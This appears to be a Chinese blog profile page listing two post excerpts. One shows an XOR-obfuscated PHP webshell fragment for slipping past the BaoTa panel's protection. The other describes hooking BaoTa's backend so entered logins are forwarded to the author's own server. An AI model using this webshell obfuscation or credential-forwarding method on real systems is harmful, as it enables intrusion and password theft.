- 博客(6)
- 收藏
- 关注
RSS订阅原创 PythonPHP异或免杀马制作以及使用编码器和解码器绕过宝塔实现webshell控制
我们先用$a接收加密 create_function后的结果,$a = ('3'^'P').(')'^'[').(')'^'L').(')'^'H').(')'^']').(')'^'L').(')'^'v').(')'^'O').(')'^'\\').(')'^'G').(')'^'J').(')'^']').(')'^'@').(')'^'F').(')'^'G');不知道为什么我的ASSERT()函数使用蚁剑连接不上,所以我就用了自定义函数的方法来制作木马。我上传的shell也被宝塔拦截了。
2023-12-21 17:12:37
1319
原创 宝塔窃取登入口令
但是仅仅只是拿到一台主机的权限仅仅是不够的,拥有者的安全防范能力也很足,mysql里全是默认的密码,宝塔的密码也和管理后台的密码不一样。起初,我预先创建一个django后端接口,想直接通过ajax请求来窃取输入的账号和密码然后转发至我的接口。同源策略是一个重要的安全策略,它用于限制一个源的文档或者它加载的脚本如何能与另一个源的资源进行交互。前端不行我们还有后端,于是我开始找宝塔的后端接口,想通过后端接口来接受账号密码并保存。然后我们修改宝塔的后端接口,使用python 发送请求给我们之前设置好的接口。
2023-12-19 18:05:19
1174
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人